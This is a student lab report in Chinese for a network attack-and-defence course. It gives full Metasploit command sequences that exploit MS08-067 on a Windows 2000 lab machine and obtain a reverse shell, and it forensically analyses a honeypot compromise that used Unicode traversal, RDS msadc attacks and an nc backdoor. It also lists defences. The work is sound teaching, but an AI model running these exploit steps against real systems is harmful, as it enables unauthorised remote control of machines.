20231901 黄丁韫 2023-2024-2 《网络攻防实践》第六周作业
1.第一部分
1.1实践内容
(1)动手实践Metasploit windows attacker
-
任务:使用metasploit软件进行windows远程渗透统计实验
-
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
- 来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
- 攻击者使用了什么破解工具进行攻击
- 攻击者如何使用这个破解工具进入并控制了系统
- 攻击者获得系统访问权限后做了什么
- 我们如何防止这样的攻击
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。 - 攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
- 防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
1.2实验过程
1.2.1 利用MS08-067漏洞,通过metasploit软件对windows靶机实施远程渗透
- 本次使用kali虚拟机进行实验,首先进入控制台,输入代码
msfconsole
- 查找要使用的漏洞对应的模块,输入指令
search ms08_067
,可以看到对应编号是0,因此,info 0即可查看靶机适用范围,use 0即可使用该模块。
- 继续,查看靶机使用范围,输入指令
info 0
,如下图,我们可以发现这个漏洞适用在Windows,Win2k。因此,可以利用该漏洞对靶机Win2实施渗透攻击。(注意:靶机ip还未进行配置,默认端口号445)
- 开始使用该漏洞模块,输入指令
use 0
,再查看可用载荷,输入指令show payloads,
- 这里我们选择攻击载荷,反向tcp连接,也就是进行主动攻击,输入命令
set payload generic/shell_reverse_tcp
- 然后再查看需要配置的参数,输入指令
show options
- 配置相应参数,可以看到攻击机的地址为:192.168.32.3,靶机的地址为:192.168.32.131
- 这里的话,只需配置靶机ip即可,输入命令
set RHOST 192.168.32.131
,再次查看配置参数,可以看到配置成功。
- 设置完毕,可以开始渗透攻击了,输入命令,
exploit
,可以看到成功获取到靶机访问权。
1.2.2 取证分析实践:解码一次成功的NT系统破解攻击
(1)攻击者使用了什么破解工具进行攻击
-
问题解答 :攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
-
分析 :
-
打开log文件,筛选有用信息进行分析,输入
ip.addr ==172.16.1.106 and http
-
跟踪数据包的tcp数据流,如下图可知,存在特殊字符%C0%AF,这是Unicode编码,由此判断攻击者进行了Unicode攻击以打开boot.ini文件。因此,存在Unicode漏洞攻击。
-
存在shell语句和"ADM!ROX!YOUR!WORLD",百度可知,这是RDS漏洞。
(2)攻击者如何使用这个破解工具进入并控制了系统 -
回答: 如下图所示,可以观察到RDS渗透攻击的间隔时间大约为6秒,推测攻击者预先编写了一系列需要执行的shell指令,并使用msadc(2).pl渗透工具一次执行。然而,攻击并未成功,随后攻击者转向Unicode攻击。在Unicode攻击中,每个请求的间隔时间约为10-12秒,这表明指令可能是手动输入的。一旦攻击者成功进入系统,注意到他们建立了一个FTP连接。然而,请求的间隔时间仍然约为10-12秒,这表明这些指令可能是由攻击者手动输入的。
-
连接至 213.116.251.162 的蜜罐主机已下载了所指定的文件,并使用nc建立了与其的远程shell通道。随后,攻击者连接到6969端口,取得了访问权限,然后进入了交互式控制阶段。
(3)攻击者获得系统访问权限后做了什么
答:由下图中可以看到,tcp流可以看到攻击者的行为:
-
对目标主机的文件系统进行了嗅探并删除了一些文件:
- 最后,通过试图删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
(4)我们如何防止这样的攻击
这样的攻击主要是RDS漏洞攻击和Unicode漏洞攻击。
防止的方法有如下几中: -
限制网络用户访问和调用CMD命令的权限;
-
若没必要使用SCRIPTS和MSADC目录,删除或改名;
-
安装windows NT系统时不要使用默认WINNT路径,您可以改为其他的文件夹,如C:\mywindowsnt;
-
用户可从如下地址下载Microsoft提供的补丁:t.asp为IIS 4.0的补丁地址,.asp为IIS 5.0补丁地址;
-
通过移除或删除系统内/msadc目录,同时移除c:\Program Files\Common Files\System\Msadc\msadcs.dll,或安装MDAC 2.1 SP2补丁,并注意及时上网更新。
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
追踪TCP流就可以看到一行字"rfp。txt",可以得知攻击者已经知道这是一台蜜罐主机。
1.2.3 团队对抗实践:windows系统远程渗透攻击和分析
- 实验环境,改为桥接模式,两人连接同一局域网
- 攻击状态:
- 攻击机Kali:192.168.1.105 (黄丁韫)
- 靶机Win2k:192.168.1.104 (周幸妤)
- 依照任务一步骤,攻击靶机,输入如下指令
msfconsole
search ms08_067
use 0 //选择攻击模块
set payload generic/shell_reverse_tcp //选择攻击载荷
show options //查看配置信息
set RHOST 192.168.1.104 //设置靶机IP,端口默认为445
exploit
- 可以看到成功获得靶机访问权
- 创建文件,输入内容
mkdir 20223901hdy //创建文件夹
cd 20231901hdy //进入新创建的文件夹
echo hello, zhouxingyu. >>20231901.txt
- 在靶机中可以看到,文件创建成功, 并且内容正确。
防御状态,对攻击过程中捕获的包进行分析:
- 追踪其tcp流可以看到,攻击机对靶机执行的所有shell命令。:
2.遇到的问题及解决
问题1:利用ms08-067入侵靶机,获取控制权时,遇到Exploit completed, but no session was created,
问题1解决方案:经过网络查阅,得出以下解决方法:
1.如果未设置targets,Metaexploit会使用默认的Exploit Target 0
此时要根据靶机版本选择合适的targets,例如这里是靶机系统为:Windows 2000,则只需加一行如下命令set target 1,如果还是不行,可以把靶机改成英文版。
问题2:改成桥接模式时显示无网络。
问题2解决方案:重启或者挂载再运行虚拟机,如果切换了网络,其ip地址不改变也需要重新挂载。
3.学习感悟、思考等
本次实验,我对MSF模块有了一个更深的理解。并且对于利用特定漏洞获取控制权有了一定的了解。
具体过程可以分为:首先就是查找相关漏洞名,然后根据漏洞名选取相应模块,在查看模块所需参数,进行相关参数配置,exploit就可以等待靶机上钩了。最后对于虚拟机的网络连接有了一个更新的认识,通过局域网如何实现虚拟机的相互通信等等。
4.参考资料
渗透测试实例
SMB协议(445)
参考书:《网络攻防技术与实现》